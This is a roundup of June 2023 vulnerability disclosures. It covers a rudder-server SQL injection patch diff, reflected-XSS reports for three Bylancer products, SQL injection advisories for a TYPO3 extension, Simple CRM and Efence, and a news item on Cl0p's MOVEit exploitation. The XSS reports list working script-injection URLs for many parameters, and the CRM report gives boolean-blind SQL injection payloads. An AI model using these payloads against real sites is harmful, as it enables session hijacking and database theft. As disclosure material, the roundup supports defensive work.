rudder-server is part of RudderStack, an open source Customer Data Platform (CDP). Versions of rudder-server prior to 1.3.0-rc.1 are vulnerable to SQL injection. This issue may lead to Remote Code Execution (RCE) due to the `rudder` role in PostgresSQL having superuser permissions by default. Version 1.3.0-rc.1 contains patches for this issue.

Expand Up

@@ -56,7 +56,7 @@ func (\*FailedEventsManagerT) SaveFailedRecordIDs(taskRunIDFailedEventsMap map\[st

}

  

for taskRunID, failedEvents := range taskRunIDFailedEventsMap {

table := \`"\` + strings.ReplaceAll(fmt.Sprintf(\`%s\_%s\`, failedKeysTablePrefix, taskRunID), \`"\`, \`""\`) + \`"\`

table := getSqlSafeTablename(taskRunID)

sqlStatement := fmt.Sprintf(\`CREATE TABLE IF NOT EXISTS %s (

destination\_id TEXT NOT NULL,

record\_id JSONB NOT NULL,

Expand Down Expand Up

@@ -94,7 +94,7 @@ func (fem \*FailedEventsManagerT) DropFailedRecordIDs(taskRunID string) {

}

  

// Drop table

table := fmt.Sprintf(\`%s\_%s\`, failedKeysTablePrefix, taskRunID)

table := getSqlSafeTablename(taskRunID)

sqlStatement := fmt.Sprintf(\`DROP TABLE IF EXISTS %s\`, table)

\_, err := fem.dbHandle.Exec(sqlStatement)

if err != nil {

Expand All

@@ -111,7 +111,7 @@ func (fem \*FailedEventsManagerT) FetchFailedRecordIDs(taskRunID string) \[\]\*Faile

  

var rows \*sql.Rows

var err error

table := \`"\` + strings.ReplaceAll(fmt.Sprintf(\`%s\_%s\`, failedKeysTablePrefix, taskRunID), \`"\`, \`""\`) + \`"\`

table := getSqlSafeTablename(taskRunID)

sqlStatement := fmt.Sprintf(\`SELECT %\[1\]s.destination\_id, %\[1\]s.record\_id

FROM %\[1\]s \`, table)

rows, err \= fem.dbHandle.Query(sqlStatement)

Expand Down Expand Up

@@ -188,3 +188,7 @@ func CleanFailedRecordsTableProcess(ctx context.Context) {

func (fem \*FailedEventsManagerT) GetDBHandle() \*sql.DB {

return fem.dbHandle

}

  

func getSqlSafeTablename(taskRunID string) string {

return \`"\` + strings.ReplaceAll(fmt.Sprintf(\`%s\_%s\`, failedKeysTablePrefix, taskRunID), \`"\`, \`""\`) + \`"\`

}

CVE-2023-30625: fix: always use a sql safe table name in failed events manager (#2664) · rudderlabs/rudder-server@0d061ff

QuickJob Portal version 6.1 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://quickjob.bylancer.com/                                             │  
│  Vendor   : Bylancer                                                                   │  
│  Software : QuickJob Portal 6.1                                                        │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09  

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /listing

GET parameter 'keywords' is vulnerable to RXSS

https://website/listing?keywords=tep81%3C%2ftitle%3E%3Cscript%3Ealert(1)%3C%2fscript%3Exjo44

Path: /listing

GET parameter 'location' is vulnerable to RXSS

https://website/listing?location=dlg48%3c%2ftitle%3e%3cscript%3ealert(1)%3c%2fscript%3eqlwm9

Path: /listing

GET parameter 'filter' is vulnerable to RXSS

https://website/listing?filter=mi7td%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eqggg0

Path: /listing

GET parameter 'sort' is vulnerable to RXSS

https://website/listing?sort=Newestvxmqa%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edxybf

Path: /listing

GET parameter 'order' is vulnerable to RXSS

https://website/listing?order=DESCpmkh0%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Edsavh

Path: /listing

GET parameter 'custom%5B8%5D' is vulnerable to RXSS

https://website/listing?keywords=&location=&placetype=&placeid=&cat=&subcat=&filter=&sort=Newest&order=DESC&job-type=4&salary-type=5&range1=11&range2=999&custom%5B8%5D=12b3r6d%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebojt4

Path: /job-seekers

GET parameter 'age_range1' is vulnerable to RXSS

https://website/job-seekers?age_range1=11grn6r%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ev1w8f

Path: /job-seekers

GET parameter 'age_range2' is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999pkqe0%22%3e%3cscript%3ealert(1)%3c%2fscript%3evbpy9&range1=22&range2=33&gender=Male

Path: /job-seekers

GET parameter 'range1' is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22aafr9%22%3e%3cscript%3ealert(1)%3c%2fscript%3etdi3d&range2=33&gender=Male

Path: /job-seekers

GET parameter 'range2' is vulnerable to RXSS

https://website/job-seekers?keywords=&location=&placetype=&placeid=&cat=&subcat=&age_range1=11&age_range2=999&range1=22&range2=33onppz%22%3e%3cscript%3ealert(1)%3c%2fscript%3ee0x0x&gender=Male

[-] Done

QuickJob Portal 6.1 Cross Site Scripting

Quicklancer Freelance Marketplace version 2.4 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://quicklancer.bylancer.com/                                          ││  Vendor   : Bylancer                                                                   ││  Software : Quicklancer Freelance Marketplace 2.4                                      ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /projectsGET parameter 'keywords' is vulnerable to RXSShttps://website/projects?keywords=j37m8%22%3e%3cscript%3ealert(1)%3c%2fscript%3ezccjrPath: /projectsGET parameter 'filter' is vulnerable to RXSShttps://website/projects?filter=dxcbn%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ennt2p&sort=Newest&order=DESC&salary-type=1&range1=11&range2=333&page=2Path: /projectsGET parameter 'sort' is vulnerable to RXSShttps://website/projects?sort=Newestaa8gm%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Ezh156Path: /projectsGET parameter 'order' is vulnerable to RXSShttps://website/projects?order=DESCprb2l%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eoz0a8Path: /projectsGET parameter 'range1' is vulnerable to RXSShttps://website/projects?range1=11h35hc%22%3e%3cscript%3ealert(1)%3c%2fscript%3explvz[-] Done

Quicklancer Freelance Marketplace 2.4 Cross Site Scripting

QuickHomes Real Estate CMS version 1.3 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://quickhomes.bylancer.com/                                           ││  Vendor   : Bylancer                                                                   ││  Software : QuickHomes - Real Estate CMS 1.3                                           ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /listingGET parameter 'location' is vulnerable to RXSShttps://website/listing?location=mabs1%3C%2ftitle%3E%3Cscript%3Ealert(1)%3C%2fscript%3Eymjsu[-] Done

QuickHomes Real Estate CMS 1.3 Cross Site Scripting

Red Hat Security Advisory 2023-3623-01 - Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services. These new packages include numerous enhancements and bug fixes. Issues addressed include cross site scripting and denial of service vulnerabilities.

Red Hat Security Advisory 2023-3623-01

The ipandlanguageredirect extension before 5.1.2 for TYPO3 allows SQL Injection.

**ipandlanguageredirect extension vulnerable to SQL Injection**

High severity GitHub Reviewed Published Jun 16, 2023 to the GitHub Advisory Database • Updated Jun 16, 2023

GHSA-4xf2-7qfv-mgfx: ipandlanguageredirect extension vulnerable to SQL Injection

Simple Customer Relationship Management 1.0 is vulnerable to SQL Injection via the email parameter.

**SCRMS-2023-05-27-1.0-Multiple-SQLi****Vendor**

**Description:**

The email parameter appears to be vulnerable to SQL injection attacks. The test payloads 45141002' or 6429=6429-- and 37491017' or 5206=5213-- were each submitted in the email parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way. The attacker can easily steal all users and their passwords for access to the system. Even if they are strongly encrypted this will get some time, but this is not a problem for an attacker to decrypt if, if they are not enough strongly encrypted.

STATUS: HIGH Vulnerability

\[+\]Payload:

\--\-
Parameter: email (POST)
    Type: boolean\-based blind
    Title: OR boolean\-based blind \- WHERE or HAVING clause
    Payload: email\=\-1544' OR 2326=2326-- eglC&password=c5K!k0k!T7&login=
\---

**Reproduce:**

href

**Proof and Exploit:**

href

**Time spend:**

01:00:00

CVE-2023-34548: CVE-nu11secur1ty/vendors/oretnom23/2023/SCRMS-2023-05-27-1.0 at main · nu11secur1ty/CVE-nu11secur1ty

Tue. 13th June, 2023

It has been discovered that the extension "ipandlanguageredirect" (ipandlanguageredirect) is susceptible to SQL Injection.

*   Release Date: June 13, 2023
*   Component Type: Third party extension. This extension is not a part of the TYPO3 default installation.
*   Component: "ipandlanguageredirect" (ipandlanguageredirect)
*   Composer Package Name: in2code/ipandlanguageredirect
*   Vulnerability Type: SQL Injection
*   Affected Versions: 5.1.1 and below
*   Severity: High
*   Suggested CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O/RC:C
*   References: not assigned yet, CWE-89

**Problem Description**

The extension fails to properly sanitize user input and is susceptible to SQL Injection.

**Solution**

An updated version 5.1.2 is available from the TYPO3 extension manager, packagist and at    
https://extensions.typo3.org/extension/download/ipandlanguageredirect/5.1.2/zip  
Users of the extension are advised to update the extension as soon as possible.

**Credits**

Thanks to Alexander Kellner for providing an updated version of the extension.

**General Advice**

Follow the recommendations that are given in the TYPO3 Security Guide. Please subscribe to the typo3-announce mailing list.

CVE-2023-35782: SQL Injection in extension "ipandlanguageredirect" (ipandlanguageredirect)

Thinking Software Efence login function has insufficient validation for user input. An unauthenticated remote attacker can exploit this vulnerability to inject arbitrary SQL commands to access, modify or delete database.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202306004

CVE ID

CVE-2023-32754

CVSS

9.8 (Critical)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

影響產品

思考軟體科技 Efence 1.2.59 DB.ver 36

問題描述

Efence之登入功能未對使用者輸入的參數進行驗證，遠端攻擊者不須權限，即可注入任意SQL語法讀取、修改及刪除資料庫。

解決方法

Update Efence version to 1.2.59 DB.ver 41

漏洞通報者

潘予德、何雨蓁 (華電聯網)

公開日期

2023-06-16

CVE-2023-32754: 思考軟體科技 Efence - SQL injection

Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies.
The new flaw, which is yet to be assigned a CVE identifier, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment."
The

Cyber Attack / Ransomware

Progress Software on Thursday disclosed a third vulnerability impacting its MOVEit Transfer application, as the Cl0p cybercrime gang deployed extortion tactics against affected companies.

The new flaw, which is yet to be assigned a CVE identifier, also concerns an SQL injection vulnerability that "could lead to escalated privileges and potential unauthorized access to the environment."

The company is urging all its customers to disable all HTTP and HTTPs traffic to MOVEit Transfer on ports 80 and 443 to safeguard their environments while a patch is being prepared to address the weakness.

The revelation comes a week after Progress divulged another set of SQL injection vulnerabilities (CVE-2023-35036) that it said could be weaponized to access the application's database content.

The vulnerabilities join CVE-2023-34362, which was exploited as a zero-day by the Clop ransomware gang in data theft attacks. Kroll said it found evidence that the group, dubbed Lace Tempest by Microsoft, had been testing the exploit as far back as July 2021.

The development also coincides with the Cl0p actors listing the names of 27 companies that it claimed were hacked using the MOVEit Transfer flaw on its darknet leak portal. According to a report from CNN, this also includes multiple U.S. federal agencies such as the Department of Energy.

"The number of potentially breached organizations so far is significantly greater than the initial number named as part of Clop's last MFT exploitation: the Fortra GoAnywhere MFT campaign," ReliaQuest said.

UPCOMING WEBINAR

🔐 Mastering API Security: Understanding Your True Attack Surface

Discover the untapped vulnerabilities in your API ecosystem and take proactive steps towards ironclad security. Join our insightful webinar!

Join the Session

Censys, a web-based search platform for assessing attack surface for internet-connected devices, said nearly 31% of over 1,400 exposed hosts running MOVEit are in the financial services industry, 16% in healthcare, 9% in information technology, and 8% in government and military sectors. Nearly 80% of the servers are based in the U.S.

Per Kaspersky's analysis of 97 families spread via the malware-as-a-service (MaaS) business model between 2015 and 2022, ransomware leads with a 58% share, followed by information stealers (24%) and botnets, loaders, and backdoors (18%).

"Money is the root of all evil, including cybercrime," the Russian cybersecurity company said, adding the MaaS schemes allow less technically proficient attackers to enter the fray, thereby lowering the bar for carrying out such attacks.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#sql